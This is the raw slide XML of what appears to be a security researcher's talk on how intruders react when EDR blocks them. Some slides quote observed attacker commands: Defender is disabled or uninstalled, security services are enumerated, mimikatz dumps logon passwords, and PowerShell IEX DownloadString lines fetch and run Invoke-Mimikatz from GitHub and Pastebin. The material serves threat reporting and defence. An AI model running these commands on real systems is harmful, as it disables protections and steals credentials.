              <a:t>If the image overlaps/hides the text, right click on the image and select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arrange &gt; Send to Back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="464B54"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To add icon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</a:rPr>
              <a:t>Drag the image from your source folder into the middle of the circle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</a:rPr>
              <a:t>For more crop options, click on the image and select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Picture Format&gt; Crop&gt;Fit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9218776" y="-2"/>
            <a:ext cx="1861974" cy="209552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1861974" h="209552">
                <a:moveTo>
                  <a:pt x="90324" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1861974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1861974" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180647" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180647" y="209552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180646" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90324" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90324" y="157164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="104777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90324" y="523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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="0" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Slide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="0" baseline="0" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" i="0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs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1320800" y="2875359"/>
            <a:ext cx="795338" cy="795338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4163746" y="2875359"/>
            <a:ext cx="795338" cy="795338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6976797" y="2875359"/>
            <a:ext cx="795338" cy="795338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-101" y="0"/>
            <a:ext cx="4356077" cy="5143500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02" y="0"/>
            <a:ext cx="4356077" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:alpha val="44000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="tx1">
                  <a:alpha val="84000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="468000" tIns="503999" rIns="288000" bIns="1728000" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2800" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click to add key message.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80" y="3795886"/>
            <a:ext cx="3759665" cy="576064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Wingdings" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0" cap="none" baseline="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additional information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860031" y="731175"/>
            <a:ext cx="1514819" cy="19389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860031" y="4654211"/>
            <a:ext cx="1514819" cy="19389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859338" y="900113"/>
            <a:ext cx="3667574" cy="3616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2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88" y="882737"/>
            <a:ext cx="7909826" cy="28808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ECC-85BE-5B4D-806C-22D3F6877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617088" y="1314868"/>
            <a:ext cx="7909375" cy="298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78400" y="4767263"/>
            <a:ext cx="3548512" cy="273844"/>
          </a:xfrm>
        </p:spPr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088" y="435778"/>
            <a:ext cx="7909824" cy="459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88" y="1221425"/>
            <a:ext cx="7909824" cy="321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8400" y="4767263"/>
            <a:ext cx="354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ITC Avant Garde Pro Bk"/>
                <a:cs typeface="ITC Avant Garde Pro Bk"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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526912" y="4719757"/>
            <a:ext cx="388492" cy="30403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" y="135789"/>
            <a:ext cx="1361588" cy="219979"/>
            <a:chOff x="-27498" y="350420"/>
            <a:chExt cx="3450734" cy="557504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-27498" y="350420"/>
              <a:ext cx="542162" cy="557504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100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5008" y="350420"/>
              <a:ext cx="2848228" cy="557504"/>
              <a:chOff x="765088" y="3199138"/>
              <a:chExt cx="3797637" cy="74333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65088" y="3199138"/>
                <a:ext cx="3797637" cy="7433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43173" y="3446165"/>
                <a:ext cx="3202045" cy="2864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162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3" r:id="rId2"/>
    <p:sldLayoutId id="2147483700" r:id="rId3"/>
    <p:sldLayoutId id="2147483699" r:id="rId4"/>
    <p:sldLayoutId id="2147483656" r:id="rId5"/>
    <p:sldLayoutId id="2147483660" r:id="rId6"/>
    <p:sldLayoutId id="2147483719" r:id="rId7"/>
    <p:sldLayoutId id="2147483720" r:id="rId8"/>
    <p:sldLayoutId id="2147483718" r:id="rId9"/>
    <p:sldLayoutId id="2147483695" r:id="rId10"/>
    <p:sldLayoutId id="2147483722" r:id="rId11"/>
    <p:sldLayoutId id="2147483721" r:id="rId12"/>
    <p:sldLayoutId id="2147483717" r:id="rId13"/>
    <p:sldLayoutId id="2147483661" r:id="rId14"/>
    <p:sldLayoutId id="2147483691" r:id="rId15"/>
    <p:sldLayoutId id="2147483692" r:id="rId16"/>
    <p:sldLayoutId id="2147483690" r:id="rId17"/>
    <p:sldLayoutId id="2147483693" r:id="rId18"/>
    <p:sldLayoutId id="2147483694" r:id="rId19"/>
    <p:sldLayoutId id="2147483696" r:id="rId20"/>
    <p:sldLayoutId id="2147483671" r:id="rId2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i="0" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
          <a:ea typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
          <a:cs typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="268288" indent="-268288" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent6"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:tabLst/>
        <a:defRPr sz="1600" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karla" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="715963" indent="-258763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tabLst/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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 baseline="0">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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088" y="1044418"/>
            <a:ext cx="7909824" cy="57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88" y="1828801"/>
            <a:ext cx="7909824" cy="261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8400" y="4767263"/>
            <a:ext cx="354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ITC Avant Garde Pro Bk"/>
                <a:cs typeface="ITC Avant Garde Pro Bk"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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6912" y="4719757"/>
            <a:ext cx="388492" cy="30403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350420"/>
            <a:ext cx="2476737" cy="400144"/>
            <a:chOff x="-27498" y="350420"/>
            <a:chExt cx="3450734" cy="557504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-27498" y="350420"/>
              <a:ext cx="542162" cy="557504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100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5008" y="350420"/>
              <a:ext cx="2848228" cy="557504"/>
              <a:chOff x="765088" y="3199138"/>
              <a:chExt cx="3797637" cy="74333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65088" y="3199138"/>
                <a:ext cx="3797637" cy="7433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3173" y="3446165"/>
                <a:ext cx="3202045" cy="2864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35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i="0" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
          <a:ea typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
          <a:cs typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="268288" indent="-268288" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent6"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:tabLst/>
        <a:defRPr sz="1600" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karla" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="715963" indent="-258763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tabLst/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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 baseline="0">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Karla" charset="0"/>
          <a:ea typeface="Karla" charset="0"/>
          <a:cs typeface="Karl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the trenches: Observations of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and tracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>actor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H. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Carvey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> researcher, OWSR-Outreach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9290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366" y="183174"/>
            <a:ext cx="6625546" cy="580732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Actor reactions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625" y="1037932"/>
            <a:ext cx="7514751" cy="358096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What happens when the Falcon sensor blocks an actor’s attempts?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We see the full range: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Give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Troubleshoot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Move to another system(s) and try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Disable security tools/AV</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16220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366" y="183174"/>
            <a:ext cx="6625546" cy="580732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Actor reactions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625" y="1037932"/>
            <a:ext cx="7514751" cy="3580960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msiexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /x {GUID} /quiet /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart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 stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinDefend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 config “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MsMpSvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” start=disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>net stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MsMpSvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /y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taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /f /t /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>im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MsMpEng.exe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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -w 1 -c (Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WmiObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -Class Win32_Product -Filter "Name LIKE '%Defender%'").Uninstall()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29528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1796" y="183174"/>
            <a:ext cx="5793208" cy="580732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Situational awareness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010" y="932424"/>
            <a:ext cx="7514751" cy="3834839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Limited situational awareness of EDR solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /svc | find “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /c "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Get-Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CylanceSVC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Status,CanStop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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What we’re NOT seeing, to a large extent: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Prior knowledge of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Knowledge or recon of monitoring prior to moving laterally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31638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923" y="94877"/>
            <a:ext cx="6895176" cy="669029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nuggets – Credential access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288" y="991039"/>
            <a:ext cx="7514751" cy="3776224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c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ""privilege::debug"" ""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logonpasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -ep Bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NoP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NonI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NoLogo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -c IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient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  <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>raw.githubusercontent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -Command 'privilege::debug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logonpasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exit’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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient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  <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pastebin.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/[REDACTED])Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
